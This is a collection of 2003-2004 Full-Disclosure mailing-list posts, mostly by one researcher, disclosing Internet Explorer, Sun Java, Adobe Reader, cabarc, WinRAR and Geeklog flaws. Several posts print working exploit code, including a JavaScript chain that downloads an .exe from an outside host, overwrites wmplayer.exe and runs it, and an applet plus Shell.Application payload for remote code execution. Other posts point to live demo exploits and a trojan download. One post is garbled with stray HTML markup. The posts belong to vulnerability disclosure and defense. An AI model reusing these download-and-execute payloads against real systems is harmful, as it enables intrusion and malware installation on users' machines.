RE: [Full-Disclosure] http://209.50.251.182/new-exploit5/
Looks familiar :) http://62.131.86.111/security/newone/exploit.htm -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Julio Canto Sent: vrijdag 9 juli 2004 10:31 To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] http://209.50.251.182/new-exploit5/ > While on vacation I ran across this on a random PC that I was using. I > looks like your typical adware exploitation. > > http://209.50.251.182/new-exploit5/ Looks like Psyme.y (results from www.virustotal.com): Scan results File: EXPLOIT.CHM Date: 07/09/2004 10:21:51 BitDefender 7.0/20040709found [VBS.Trojan.Psyme.W] ClamWin devel-20040517/20040708 found nothing eTrustAV-Inoc 4641/20040708 found nothing F-Prot 3.15/20040707 found nothing Kaspersky 3.0/20040709found [TrojanDownloader.VBS.Psyme.y] McAfee 4375/20040709 found [VBS/Psyme] NOD32v2 1.806/20040707 found [VBS/TrojanDownloader.Psyme.V] Norman 5.70.10/20040708found nothing Panda 7.02.00/20040708found nothing Sybari 7.5.1314/20040709 found [TrojanDownloader.VBS.Psyme.y] Symantec8.0/20040708found nothing TrendMicro 7.000/20040709 found [CHM_Psyme.Y] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] IE sucks : sun java virtual machine insecure tmp file creation
INTRODUCTION
Actually I wasn't really sure if I ought to post this, but
after some consideration I decided that it might serve as an example of the
completely messed up state we find internet explorer in today.
There's a very minor issue with the way the sun java virtual
machine creates temporary files from applets. IE blows it off the chart, combining
this with some unresolved issues in IE can lead to remote code execution
DETAILS
A couple of days back Marc Schoenefeld posted an advisory
about an implementation flaw in the sun java virtual machine.
By passing a specially crafted byte array to the Font.createFont method you
could get the whole vm to crash
My partner in crime HTTP-EQUIV was investigating this report
when he noticed that this demo created a temporary file in his temp folder
called
+~JFx.tmp
Where x is a random 5 digit number, He mailed me to say
hey take a look at this
I decompiled marcs class and noticed that the .tmp
file being created contained the exact contents of the byte array that got
passed to Font.createFont
Now If you can create a file on someone's disk drive and get
your browser to render it, we've got our selves something
Ok creating an applet that creates the file on a users disk drive
is trivial
import java.applet.Applet;
import java.awt.Font;
import java.net.URL;
import netscape._javascript_.JSObject;
public class Jelmer extends Applet {
public void init() {
try {
Font f = Font.createFont(Font.TRUETYPE_FONT,
new URL(getParameter("infile")).openStream());
} catch(Exception ignored) {}
try {
JSObject jsWin = JSObject.getWindow(this);
jsWin.call("doneloading", new Object[]{});
} catch(Exception e) {
e.printStackTrace();
}
}
}
This applet creates the file from the url it get's passed as
a parameter and calls the _javascript_ function doneloading when it's done
We opt to store a file with these contents to the temp
</span></font></p>
<p class=MsoNormal><font size=2 face=Arial><span style='font-size:10.0pt;
font-family:Arial'>o=new ActiveXObject('Shell.Application');</span></font></p>
<p class=MsoNormal><font size=2 face=Arial><span style='font-size:10.0pt;
font-family:Arial'>o.ShellExecute('cmd.exe','/c pause');</span></font></p>
<p class=MsoNormal><font size=2 face=Arial><span style='font-size:10.0pt;
font-family:Arial'>
Http-equiv's jan 1 Shell.Application bug
http://www.securityfocus.com/archive/1/348688/2003-12-31/2004-01-06/0
Now we have to deal with the random filename, no problem,
modern computers are pretty fast, and the random portion of the filename is
only 5 digit's,
Using an old bug
(http://lists.netsys.com/pipermail/full-disclosure/2004-February/016881.html)
to check for the existence of local files we can run thu every possibility in a
couple of seconds like this
</span></font></p>
<p class=MsoNormal><font size=2 face=Arial><span style='font-size:10.0pt;
font-family:Arial'>Function Exists(filename)</span></font></p>
<p class=MsoNormal><font size=2 face=Arial><span style='font-size:10.0pt;
font-family:Arial'>On Error Resume Next</span></font></p>
<p class=MsoNormal><font size=2 face=Arial><span style='font-size:10.0pt;
font-family:Arial'>LoadPicture(filename)</span></font></p>
<p class=MsoNormal><font size=2 face=Arial><span style='font-size:10.0pt;
font-family:Arial'>Exists = Err.Number = 481</span></font></p>
<p class=MsoNormal><font size=2 face=Arial><span style='font-size:10.0pt;
font-family:Arial'>End Function </span></font></p>
<p class=MsoNormal><font size=2 face=Arial><span style='font-size:10.0pt;
font-family:Arial'>
</span></font></p>
<p class=MsoNormal><font size=2 face=Arial><span style='font-size:10.0pt;
font-family:Arial'>function doneloading() {</span></font></p>
<p class=MsoNormal><font size=2 face=Arial><span style='font-size:10.0pt;
font-family:Arial'>dir = 'C:\\Documents and Settings\\USERNAME\\Local
Settings\\Temp\\'</span></font></p>
<p class=MsoNormal><font size=2 face=Arial><span style='font-size:10.0pt;
font-family:Arial'>for (i=0;i<10;i++) {</span></font></p>
<p class=MsoNormal><font size=2 face=Arial><span style='font-size:10.0pt;
font-family:Arial'>filename = '+~JF' + i + '.tmp'</span>
RE: [Full-Disclosure] Just out - KB839645 - wonder what this fixes?
Count your blessings, that's blazingly fast for Microsoft This one is over 7 months old, today they finally patched it http://packetstormsecurity.org.pk/0312-advisories/ie_showHelp.txt -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Aaron Horst Sent: dinsdag 13 juli 2004 22:11 To: Matt Ostiguy Cc: Full-Disclosure ([EMAIL PROTECTED]) Subject: Re: [Full-Disclosure] Just out - KB839645 - wonder what this fixes? Yet another 6 month old exploit, just fixed! http://www.securityfocus.com/archive/1/351379 Gotta love the fast Microsoft responses. AnthraX101 On Tue, 13 Jul 2004 15:02:37 -0400, Matt Ostiguy <[EMAIL PROTECTED]> wrote: > http://www.microsoft.com/technet/security/bulletin/MS04-024.mspx > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] one new trojan
It abuses the "MSIE JVM bytecode verifier" bug found by LSD in 2002 http://lsd-pl.net/vulnerabilities.html Patched by http://www.microsoft.com/technet/security/bulletin/MS03-011.mspx -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Willem Koenings Sent: zaterdag 24 juli 2004 19:14 To: [EMAIL PROTECTED] Subject: [Full-Disclosure] one new trojan hi, today i encountered one new trojan : web.exe / services.exe, arrives in arc.zip and is executed via java. kaspersky doesn't identify this one yet. web exe is placed to the root dir, then copied as services.exe to the SystemRoot\inetg if anyone is curious to play with it : http://conyc.com/galleryg/arc.zip starter script is here: http://conyc.com/galleryg/starter.html willem. -- ___ Sign-up for Ads Free at Mail.com http://promo.mail.com/adsfreejump.htm ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Re: Microsoft Internet Explorer 6 Protocol Handler Vulnerability
>I found this vulnerability (or class of them) in July 2003 and >described it on several security lists on March 9th, 2004. There's at least one instance of prior art that I aware of http://cert.uni-stuttgart.de/archive/bugtraq/2001/03/msg00193.html I think there have been more but I can't seem to find them >For examples >(actual exploitable vulnerabilities), you can try Google search for >"argument injection vulnerability" or read my messages on this list >about Outlook mailto: URL vulnerability, Windows Help and Support >Center HCP: URL vulnerability, or Lotus Notes notes: URL vulnerability. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Microsoft cabarc directory traversal
Description: Cabarc is a command line tool to create and extract cabinet files (.cab) it is included in the Windows Support Tools package It is subject to a directory traversal bug similar to those found in unzip, unarj etc.. Technical Details: ..\file fails ../file defeats the protection Demonstration: http://62.131.86.111/security/cabarc/demo.cab Risk : low ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Adobe acrobat / Adobe Reader 6 can read local files
Adobe acrobat / Adobe Reader 6 can read local files Description Acrobat/ Acrobat reader is software for viewing and printing Adobe Portable Document Format (PDF) files. Adobe PDF files can be viewed on most major operating systems. Version 6 of this program has an issue with the way it handles embedding macromedia flash files directly into a pdf. This allows a malicious website operator to steal local files from a user's hard drive including cookie files Technical Details: Version 6 of the pdf format introduced a new way to embed movies directly into the pdf file. In previous versions one could only link to media in external files Adobe reader extracts this swf file from the pdf and saves it under a random name to your temp dir, on windows XP and 2000 this dir is usually located at C:\Documents and Settings\\Local Settings\Temp It then appears to "link" directly to this saved file in effect making your local hard disk the codebase for this swf file and allowing it read access to all of the files on your hard drive Systems affected: Adobe reader 6 Adobe acrobat 6 Demonstration: Create a text file called c:\jelmer.txt then proceed to click on http://62.131.86.111/security/acrobat/demo.pdf Risk: medium ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Re: Adobe acrobat / Adobe Reader 6 can read local files
The demo uses script behind the scenes to start the movie, So the demo would fail if you disabled scripting I don't believe there's a way to start the movie without with scripting disabled. So you should be safe. But I'll admit to being anything but an expert on pdf.. Yet anyway so I might me overlooking something --jelmer -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jay Libove Sent: dinsdag 12 oktober 2004 19:01 To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Re: Adobe acrobat / Adobe Reader 6 can read local files I have Acrobat Reader configured to NOT run Javascript. The demo did not work on my system (XP, SP2, Acrobat Reader v6.0.2 dated 5/18/2004). So, is having JavaScript enabled also a requirement in order for this embedded SWF exploit to work? -Jay Libove, CISSP > Message: 20 > Date: Tue, 12 Oct 2004 15:56:32 +0200 > From: Jelmer <[EMAIL PROTECTED]> > To: [EMAIL PROTECTED], [EMAIL PROTECTED] > Subject: [Full-Disclosure] Adobe acrobat / Adobe Reader 6 can read local files > > Adobe acrobat / Adobe Reader 6 can read local files > > Description > > Acrobat/ Acrobat reader is software for viewing and printing Adobe Portable > Document Format (PDF) files. Adobe PDF files can be viewed on most major > operating systems. > > Version 6 of this program has an issue with the way it handles embedding > macromedia flash files directly into a pdf. This allows a malicious website > operator to steal local files from a user's hard drive including cookie > files > > Technical Details: > > Version 6 of the pdf format introduced a new way to embed movies directly > into the pdf file. In previous versions one could only link to media in > external files > > Adobe reader extracts this swf file from the pdf and saves it under a random > name to your temp dir, on windows XP and 2000 this dir is usually located at > > C:\Documents and Settings\\Local Settings\Temp > > It then appears to "link" directly to this saved file in effect making your > local hard disk the codebase for this swf file and allowing it read access > to all of the files on your hard drive > > Systems affected: > > Adobe reader 6 > Adobe acrobat 6 > > Demonstration: > > Create a text file called c:\jelmer.txt then proceed to click on > > http://62.131.86.111/security/acrobat/demo.pdf > > Risk: medium ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code
when viewing mail in recent versions of outlook it operates in the
restricted zone ,eg no active scripting allowed to run, so these wont be
exploitable
unless someone proofs otherwise that is ;)
- Original Message -
From: "Kristian Hermansen" <[EMAIL PROTECTED]>
To: "Full Disclosure" <[EMAIL PROTECTED]>
Sent: Friday, September 12, 2003 2:40 AM
Subject: Re: [Full-Disclosure] Internet explorer 6 on windows XP allows
exection of arbitrary code
> Wow, this one is pretty scary. Nice work putting it together. Does
anyone
> know if Outlook is exploitable with this? I'd think that Outlook would
not
> try to play the media file, but I'm not quite sure. Wow, what a rush of
> pretty critical bugs lately!!!
>
> Kris Hermansen
>
>
> - Original Message -
> From: "jelmer" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Cc: <[EMAIL PROTECTED]>
> Sent: Thursday, September 11, 2003 6:31 PM
> Subject: [Full-Disclosure] Internet explorer 6 on windows XP allows
exection
> of arbitrary code
>
>
> > Internet explorer 6 on windows XP allows exection of arbitrary code
> >
> > DESCRIPTION :
> >
> > Yesterday Liu Die Yu released a number series of advisories concerning
> > internet explorer
> > by combining on of these issues with an earlier issue I myself reported
a
> > while back
> > You can construct a specially crafted webpage that can take any action
on
> a
> > users system
> > including but not limited to, installing trojans, keyloggers, wiping the
> > users harddrive etc.
> >
> >
> > TECHNICAL EXPLAINATION :
> >
> > Internet explorer 6 comes with a media sidebar in wich you can load and
> play
> > mediaclips
> > without even leaving the browser. when you instruct the mediabar to load
a
> > file from an
> > unknown host or the HTTP status returned by an existing host indicates
an
> > error
> > this media bar displays an error page inside the media bar namely
> >
> > res://C:\WINDOWS\System32\browselc.dll/mb404.htm#path
> >
> > res URL's are treated as being in the "my computer zone" and are loaded
> from
> > the users filesystem
> > perfect conditions for the issue I describe on
> >
> >
http://www.mail-archive.com/[EMAIL PROTECTED]/msg06791.html
> >
> > To work. now all that is needed is a way to inject this exploit code
into
> > this page
> > This method was graciously provided by Liu Die Yu as you can read on
> >
> > http://www.securityfocus.com/archive/1/336937/2003-09-08/2003-09-14/0
> >
> > Combining these issues we get something like :
> >
> > --snip--
> >
> >
> >
> > var x = new ActiveXObject("Microsoft.XMLHTTP");
> > x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0);
> > x.Send();
> >
> > var s = new ActiveXObject("ADODB.Stream");
> > s.Mode = 3;
> > s.Type = 1;
> > s.Open();
> > s.Write(x.responseBody);
> >
> > s.SaveToFile("C:\\Program Files\\Windows Media
> Player\\wmplayer.exe",2);
> > location.href = "mms://";
> >
> >
> >
> >
> >
> > function preparecode(code) {
> > result = '';
> > lines = code.split(/\r\n/);
> > for (i=0;i<lines.length;i++) {
> >
> > line = lines[i];
> > line = line.replace(/^\s+/,"");
> > line = line.replace(/\s+$/,"");
> > line = line.replace(/'/g,"\\'");
> > line = line.replace(/[\\]/g,"");
> > line = line.replace(/[/]/g,"%2f");
> >
> > if (line != '') {
> > result += line +'\\r\\n';
> > }
> > }
> > return result;
> > }
> >
> > function doit() {
> > mycode = preparecode(document.all.code.value);
> > myURL = "file:javascript:eval('" + mycode + "')";
> > window.open(myURL,"_media")
> > }
> >
> >
> > window.open("error.jsp","_media");
> >
> > setTimeout("doit()", 5000);
> >
> >
> >
> >
> > --snip--
> >
> > error.jsp is a jsp page that consists of one line, namely
> >
> > <% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %>
> >
> >
> > DEMONSTRATION :
> >
> > A demonstration is provided at :
> >
> > http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm
> >
> >
> > WORKAROUND :
> >
> > Disable active scripting or do "the sensible thing" and pick another
> browser
> > such as the
> > excellent mozilla firebird.
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code
Internet explorer 6 on windows XP allows exection of arbitrary code
DESCRIPTION :
Yesterday Liu Die Yu released a number series of advisories concerning
internet explorer
by combining on of these issues with an earlier issue I myself reported a
while back
You can construct a specially crafted webpage that can take any action on a
users system
including but not limited to, installing trojans, keyloggers, wiping the
users harddrive etc.
TECHNICAL EXPLAINATION :
Internet explorer 6 comes with a media sidebar in wich you can load and play
mediaclips
without even leaving the browser. when you instruct the mediabar to load a
file from an
unknown host or the HTTP status returned by an existing host indicates an
error
this media bar displays an error page inside the media bar namely
res://C:\WINDOWS\System32\browselc.dll/mb404.htm#path
res URL's are treated as being in the "my computer zone" and are loaded from
the users filesystem
perfect conditions for the issue I describe on
http://www.mail-archive.com/[EMAIL PROTECTED]/msg06791.html
To work. now all that is needed is a way to inject this exploit code into
this page
This method was graciously provided by Liu Die Yu as you can read on
http://www.securityfocus.com/archive/1/336937/2003-09-08/2003-09-14/0
Combining these issues we get something like :
--snip--
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i
DEMONSTRATION :
A demonstration is provided at :
http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm
WORKAROUND :
Disable active scripting or do "the sensible thing" and pick another browser
such as the
excellent mozilla firebird.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code
- Original Message - From: "Thor Larholm" <[EMAIL PROTECTED]> To: "jelmer" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]> Cc: <[EMAIL PROTECTED]> Sent: Friday, September 12, 2003 1:02 AM Subject: Re: [Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code > The new addition here is abusing how you are able to load a ressource file, > residing in a local security zone, into a window object. Service Pack 1 for IE6 > did a lot to deter this on most regular window objects, but should have extended > that effort to searchpanes as well. Seeing as the content of a search pane can > be any registered COM extension to IE, perhaps more should be done to completely > separate these from the reach of ordinary scripting. Agreed, I noticed they did put some effort into fixing these issues eg. the greymagic issue with the malformed xml file for instance only allowed xss'ing a a site containinging this file. before sp1 one would have been able to script in the res:// page. wich would have much more severe consequences concidering that IE's zoning system is just so horribly and utterly broken. So they did well on this , the problem just is that microsoft keeps having these little oversights, special cases they forget about such as the res pages in the mediabar or also recently forgetting to patch the dynamic version of the object tag. It's generally a tell tale sign of bad software design > Combining the mediabar ressource loading with the file-protocol proxy > demonstrates just how effectively one can combine several vulnerabilities to > achieve a higher level of automation in planting and executing files. The media > bar ressource loading, and any other ressource loading technique, can be > combined with any other cross-domain scripting vulnerability to achieve the same > result. > > We will definitely see more combinatorial vulnerabilities in the time to come. Combining vulnerabilies is nothing new people always have and always will. HTTP-EQUIV seems especially well versed in this kind of stuff, remember for instance my mhtml/codebase trick and his mediaplayer issue wich also lead to code execution. IE is rather heavily researched so at any given time you will have quite a number of unpatched vulnerabilties, as you are probably more aware of than anybody, considering http://pivx.com/larholm/unpatched/ is your site :) For non buffer overflow code execution generally a number of conditions has to be met. in this case it where 3 - find way of executing code - find something to inject the exploit code in - find something that will allow us to inject exploit code into stuff not under our control seperatly none of these is perticularly dangerous but combined their full power is unleeched But it's a lot to ask from a single researcher to ask to come up with 3 issues (unless your name is Liu Die Yu offcourse :) then you can easily come up with 10 hehe) I got to 2 liu provided 3 > > > Regards > Thor Larholm > PivX Solutions, LLC - Senior Security Researcher > http://www.pivx.com/larholm/unpatched - Unpatched IE vulnerabilities > > > - Original Message - > From: "jelmer" <[EMAIL PROTECTED]> > To: <[EMAIL PROTECTED]> > Cc: <[EMAIL PROTECTED]> > Sent: Thursday, September 11, 2003 3:31 PM > Subject: [Full-Disclosure] Internet explorer 6 on windows XP allows exection of > arbitrary code > > > > Internet explorer 6 on windows XP allows exection of arbitrary code > > > > DESCRIPTION : > > > > Yesterday Liu Die Yu released a number series of advisories concerning > > internet explorer > > by combining on of these issues with an earlier issue I myself reported a > > while back > > You can construct a specially crafted webpage that can take any action on a > > users system > > including but not limited to, installing trojans, keyloggers, wiping the > > users harddrive etc. > http://lists.netsys.com/pipermail/full-disclosure/2003-September/009917.html> > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] RE:Internet explorer 6 on windows XP allows exection of arbitrary code ( and opera and Mozilla too)
serious ? these if I understand correctly merely crash your browser nothing
perticularly serious about that.
Granted no browser will be without flaws so there is probably heaps of
stuff to be found in mozilla aswell, but remote code execution??
I dont believe there has been a single flaw in netscape or mozilla that
allowed you to execute code simply by putting together some javascript
(you can correct me on this) even when it was the dominant browser and
legendary guys like george guninski roamed the streets.
Sure it will probably have stuff like overflows, nearly everything does
but particularly ActiveX is just utterly insane and makes you want to bang
your head against a brick wall screaming what the hell where they thinking
- Original Message -
From: "meme-boi" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Friday, September 12, 2003 2:33 AM
Subject: [Full-Disclosure] RE:Internet explorer 6 on windows XP allows
exection of arbitrary code ( and opera and Mozilla too)
> >WORKAROUND :
>
> >Disable active scripting or do "the sensible thing" and pick another
> >>browser such as the>excellent mozilla firebird.
>
> Mozilla ...
>
>
> t = new Packages.sun.plugin.javascript.navig5.JSObject(1,1);
>
>
>
>
> hmmm
>
> or
>
> http://drorshalev.brinkster.net/dev/memeboi/werd.html
>
> Both serious issues mozilla has yet to fix.
>
>
> Or we can look at Opera and conclude that no graphical browser is safe:
>
>
> /usr/bin/opera: line 138: 1289 Segmentation fault
> "${BINARYDIR}/opera" "[EMAIL PROTECTED]"
> "${BINARYDIR}/opera" "[EMAIL PROTECTED]"
> (gdb) /opt/opera/lib/opera/plugins/operamotifwrapper: error while loading
> shared libraries: libXm.so.2: cannot open shared object file: No such file
> or directory
> (gdb) backtrace
> #0 0x21ad4397 in waitpid () from /lib/libc.so.6
> #1 0x080777f6 in kill_pid ()
> #2 0x080767a3 in wait_for ()
> #3 0x080687c6 in execute_command_internal ()
> #4 0x0806c0a7 in execute_command ()
> #5 0x0805d48c in reader_loop () <---murder loop
> #6 0x0805b8a0 in main ()
> #7 0x21a407a6 in __libc_start_main () from /lib/libc.so.6 <--redrum lib
> (gdb) info reg
> eax0xfe00 -512
> ecx0x5da26398 1570923416
> edx0x0 0
> ebx0x -1
> esp0x5da2635c 0x5da2635c
> ebp0x5da26378 0x5da26378
> esi0x0 0
> edi0x -1
> eip0x21ad4397 0x21ad4397
> eflags 0x246582
> cs 0x23 35
> ss 0x2b 43
> ds 0x2b 43
> es 0x2b 43
> fs 0x0 0
> gs 0x0 0
> fctrl 0x37f895
> fstat 0x0 0
> ftag 0x 65535
> fiseg 0x0 0
> fioff 0x0 0
> foseg 0x0 0
> fooff 0x0 0
> fop0x0 0
> mxcsr 0x0 0
> orig_eax 0x72 114
>
> (gdb) disass $eip-0x20 $eip+0x20
> Dump of assembler code from 0x21ad4377 to 0x21ad43b7:
> 0x21ad4377 :mov$0x7,%dh
> 0x21ad4379 :add%cl,0x2b88b3(%ebx)
> 0x21ad437f :add%cl,0xf685087d(%ebx)
> 0x21ad4385 :jne0x21ad43be
> 0x21ad4387 :mov0xc(%ebp),%ecx
> 0x21ad438a :mov0x10(%ebp),%edx
> 0x21ad438d :push %ebx
> 0x21ad438e :mov%edi,%ebx
> 0x21ad4390 :mov$0x72,%eax
> 0x21ad4395 :int$0x80
> 0x21ad4397 :pop%ebx
> 0x21ad4398 :cmp$0xf000,%eax
> 0x21ad439d :mov%eax,%esi
> 0x21ad439f :ja 0x21ad43ae
> 0x21ad43a1 :mov%esi,%eax
> 0x21ad43a3 :mov0xfff4(%ebp),%ebx
> 0x21ad43a6 :mov0xfff8(%ebp),%esi
> 0x21ad43a9 :mov0xfffc(%ebp),%edi
> 0x21ad43ac :leave
> 0x21ad43ad :ret
> 0x21ad43ae :neg%esi
> 0x21ad43b0 :call 0x21a40980 <__errno_location>
> 0x21ad43b5 :mov%esi,(%eax)
>
>
> Time to revert to command line !
>
> I speak about this on the mighty bugtraq but noone listen. not even friend
> 9or.
> Anyways. I have to go clean the floor at walmart.
>
> ninjas are bad
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Internet explorer 6 on windows XP allows exection of arbitrary code (Demonstration Exploit Warning)
on my system mediaplayer is a protected file much like notepad.exe or telnet.exe are, wich means that when you delete or overwrite them they get put back by the system. I am just invoking it really quick. maybe they added this behaviour in wmp9 and on wmp8 the changes are permanent in wich case the changes would be permanent and you'd have a broken mediaplayer. If this is true I apologize anyway i'll put up links to backup copies on my site when I have the time just in case --jelmer On Saturday 13 September 2003 15:22, S G Masood wrote: > Hi, > > Jelmer probably forgot to mention this about the > demonstration exploit[1] in his advisory[2]: Back up > "C:\Program Files\Windows Media Player\wmplayer.exe" > before using the exploit as the exploit replaces the > original wmplayer.exe(main WMP executable) with the > dropped file(also named wmplayer.exe). After > exploitation, the dropped wmplayer.exe can be deleted > and the backed-up, original version replaced. > > If this is not done, the existing installation of > Windows Media Player will be damaged and will have to > be reinstalled. And, ofcourse, since the exploit > depends on replacing the WMP executable, it will not > work if Media Player is running. Test the exploit > while Media Player is not running. > > Tested here successfully with Win2kSP0 IE6 WMP9. > > > [1]Exploit -> > http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm > [2]http://www.securityfocus.com/archive/1/337285 > > > -- > Regards, > S.G.Masood > Hyderabad, > India. > > > > -- > `You don't believe in me,' observed the Ghost.`Why do > you doubt your senses?' > `Because,' said Scrooge, `a little thing affects them. > A slight disorder of the stomach makes them cheats. > You may be an undigested bit of beef, a blot of > mustard, a crumb of cheese, a fragment of an underdone > potato. There's more of gravy than of grave about you, > whatever you are!' > > -Charles Dickens in `A Christmas Carol' > -- > > > > > > __ > Do you Yahoo!? > Yahoo! SiteBuilder - Free, easy-to-use web site design software > http://sitebuilder.yahoo.com > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Winrar doesn't determine the actual size of compressed files
Speeking of which.. It also has the directory traversal bug described on http://lists.insecure.org/lists/bugtraq/2003/May/0113.html just test with the .zip file located there tested on 3.20 - Original Message - From: "Bipin Gautam" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Tuesday, September 09, 2003 1:01 PM Subject: [Full-Disclosure] Winrar doesn't determine the actual size of compressed files > ---[ about WinRAR]--- > Winrar (http://www.rarsoft.com/) is one of the most popular file compression utilities for Windows. > > --[summary]--- > Winrar incorrectly determines the actual size of compressed files saved in .rar format by reading it's header information. > > --[details]-- > Recently we managed to devise a technique to spoof the header and creating a valid CRC checksum. Later we found that Winrar only depends on it's header information and CRC check sum to determine the size and integrity of .rar files. Before uncompressing .rar files, Winrar pre-allocates space according to the actual file size specified in the header to avoid fragmentation.But pre-allocation occurs without checking the available hdd space. Then it goes extracting, even if the hdd size is less than the size of the files.We did a test by extracting 1GB files in a hdd with 700MB free space. > > Surprisingly, we later discover that even in detecting of header corruption WinRAR doesn't enforce to avoid extraction process. this lead WinRAR to believe that the actual size is correct .We managed to exploit this and create a proof of concept to demonstrate this problem by changing the actual file size in it's header. When it starts extracting it doesn't find any valid data in the archive and on the basis of it's header it attempts to extract 1 gigabyte of data and simply goes on writing "0x00" filling up valuable hdd space. > > --[Proof of concept]-- > The proof of concept is a valid .rar file which is just 100 bytes but it's header has been forged to fool Winrar into thinking that it's a 1 gigabyte file by forging it's header and creating a valid CRC checksum. All versions of Winrar (upto 3.20 - latest version till date) seem to be vulnerable. > > The proof of concept of .rar file can be obtained from the following URL: http://www.geocities.com/visitbipin/test123.zip > If you extract the file Winrar will try to extract this 100 bytes .rar file trusting the information in it's header but not on the basis of it's data integrity. > > --[Background Information]-- > This bug was originally discovered by hUNT3R, a member of 01 Security Sumbission. The vendor was notified via email. Further discussion took place in 01 Security Sumbission's forum with the developer of Winrar (Eugene Roshal) : > URL: http://www.ysgnet.com/phorum/read.php?f=1&i=341&t=324#reply_341 > > ---[about 01 security submission]--- > 01s.s is a small group having experience as security specialists, programmers and system administrators > http://www.ysgnet.com/hn. > > > >| .oÛ_Oo.h»UNTER.oO_Ûo. | > § !¹007Õ°¿ÑïÞÎß°Õæ9*½¹! ‡ > > _ > Secure mail ---> http://www.blackcode.com > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: I have fixes for the Geeklog vulnerabilities
Dirk, Ok let me get this straight, basicly what your saying is, He's correct on one point the xss issue, and the others might possibly affect mysql 4.1" (it does) and then you go about and tell him how he wasted everybodys time So if it affects only 1% of your userbase its not an issue and you shouldn't be reporting it ? even on mysql 3 its probably posible to constuct some url that will suck up a lot of resources on your site you claim Three members of the Geeklog development team have now been trying to reproduce these issues and failed, wouldn't your time have been better spend *fixing* these issues, it's hardly rocket science. why wait until someone comes up with a clever way to exploit it. It's obviously a risk why wait until it becomes a threat IMHO you've got the wrong attitude. Anyway I am not done yet I don't normally "do" sql injection but beeing anoyed with your response as I was i took a quick look at this geeklog, and I was stunned at how insecure it was - It by default stores the password hash in a cookie, you cant turn that off - you dont have to enter your old password in order to change it this means that any xss issue in this site will lead to compromises of accounts, you can steal the hash and userID place it in your cookie, log in and voila, if you do this you have to be *EXTREMELY* wary of xss issues, well your not, you can find these all over the place all the classics just work like test in the forum, I wont even bother listing all the issues parameters passed in urls that get inserted into queries get sanitized hardly anywhere , I attached a python script that should crack any users account who ever posted to the forum's in under half an hour, just get the hash stuff it and the acomanying user id in a cookie, get to the site and change the password The exploit is rather messy and I haven't tested it too thorougly but it should work (i think :) ) note this is a seperate issue as the ones reported by Lorenzo. but again these issues all over the place --jelmer - Original Message - From: "Dirk Haun" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Sunday, October 05, 2003 11:03 PM Subject: [Full-Disclosure] Re: I have fixes for the Geeklog vulnerabilities > Lorenzo Hernandez Garcia-Hierro wrote: > > >Due to the 